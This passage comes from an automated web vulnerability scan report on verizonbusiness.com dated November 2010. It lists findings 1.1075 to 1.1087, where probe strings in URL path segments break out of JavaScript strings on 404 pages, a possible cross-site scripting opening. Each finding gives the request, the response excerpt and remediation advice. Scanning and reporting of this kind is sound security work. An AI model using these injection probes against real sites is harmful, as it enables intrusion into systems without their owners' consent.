<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccount/toolsa04cd';e55fbd83fcc/ebonding/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1075. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/ebonding/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 803fe"%3b926d64d23d6 was submitted in the REST URL parameter 4. This input was echoed as 803fe";926d64d23d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools/ebonding803fe"%3b926d64d23d6/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:39 GMT
Content-Type: text/html
Content-Length: 46516
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccount/tools/ebonding803fe";926d64d23d6/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1076. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/ebonding/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2da3'%3b5635c2595b9 was submitted in the REST URL parameter 4. This input was echoed as d2da3';5635c2595b9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools/ebondingd2da3'%3b5635c2595b9/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:08 GMT
Content-Type: text/html
Content-Length: 46514
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccount/tools/ebondingd2da3';5635c2595b9/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1077. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/edibilling/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3dfb6'%3bba623897a7e was submitted in the REST URL parameter 1. This input was echoed as 3dfb6';ba623897a7e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support3dfb6'%3bba623897a7e/myaccount/tools/edibilling/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:07 GMT
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/support3dfb6';ba623897a7e/myaccount/tools/edibilling/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1078. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/edibilling/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad672"%3bcfdbc7ae9c6 was submitted in the REST URL parameter 1. This input was echoed as ad672";cfdbc7ae9c6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /supportad672"%3bcfdbc7ae9c6/myaccount/tools/edibilling/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/supportad672";cfdbc7ae9c6/myaccount/tools/edibilling/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINI
...[SNIP]...

1.1079. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/edibilling/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dad2a'%3b9a5034e6e0d was submitted in the REST URL parameter 2. This input was echoed as dad2a';9a5034e6e0d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccountdad2a'%3b9a5034e6e0d/tools/edibilling/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccountdad2a';9a5034e6e0d/tools/edibilling/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1080. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/edibilling/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa5b6"%3b7538b6635a3 was submitted in the REST URL parameter 2. This input was echoed as fa5b6";7538b6635a3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccountfa5b6"%3b7538b6635a3/tools/edibilling/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccountfa5b6";7538b6635a3/tools/edibilling/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.1081. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/edibilling/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73b65'%3b64e9c4424ca was submitted in the REST URL parameter 3. This input was echoed as 73b65';64e9c4424ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools73b65'%3b64e9c4424ca/edibilling/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43868
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccount/tools73b65';64e9c4424ca/edibilling/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1082. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/edibilling/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f31e1"%3b1ed10348e60 was submitted in the REST URL parameter 3. This input was echoed as f31e1";1ed10348e60 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/toolsf31e1"%3b1ed10348e60/edibilling/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:00 GMT
Content-Type: text/html
Content-Length: 43870
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccount/toolsf31e1";1ed10348e60/edibilling/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.1083. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/edibilling/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2050c'%3b98f93bc5a06 was submitted in the REST URL parameter 4. This input was echoed as 2050c';98f93bc5a06 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools/edibilling2050c'%3b98f93bc5a06/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:36:39 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 46518
Date: Wed, 17 Nov 2010 00:36:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccount/tools/edibilling2050c';98f93bc5a06/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1084. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/edibilling/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2629a"%3bc8c9da229d0 was submitted in the REST URL parameter 4. This input was echoed as 2629a";c8c9da229d0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools/edibilling2629a"%3bc8c9da229d0/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:14 GMT
Content-Type: text/html
Content-Length: 46520
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
bx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccount/tools/edibilling2629a";c8c9da229d0/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1085. http://www.verizonbusiness.com/templates/expressInstall.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/expressInstall.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96cff'%3bf9f6c9819db was submitted in the REST URL parameter 1. This input was echoed as 96cff';f9f6c9819db in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates96cff'%3bf9f6c9819db/expressInstall.swf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:13 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40636
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/templates96cff';f9f6c9819db/expressInstall.swf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1086. http://www.verizonbusiness.com/templates/expressInstall.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/expressInstall.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad629"%3ba8ccbdd56fc was submitted in the REST URL parameter 1. This input was echoed as ad629";a8ccbdd56fc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templatesad629"%3ba8ccbdd56fc/expressInstall.swf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:46 GMT
Content-Type: text/html
Content-Length: 40636
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templatesad629";a8ccbdd56fc/expressInstall.swf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.1087. http://www.verizonbusiness.com/templates/expressInstall.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/expressInstall.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 370c9"%3b01455493364 was submitted in the REST URL parameter 2. This input was echoed as 370c9";01455493364 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/expressInstall.swf370c9"%3b01455493364 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
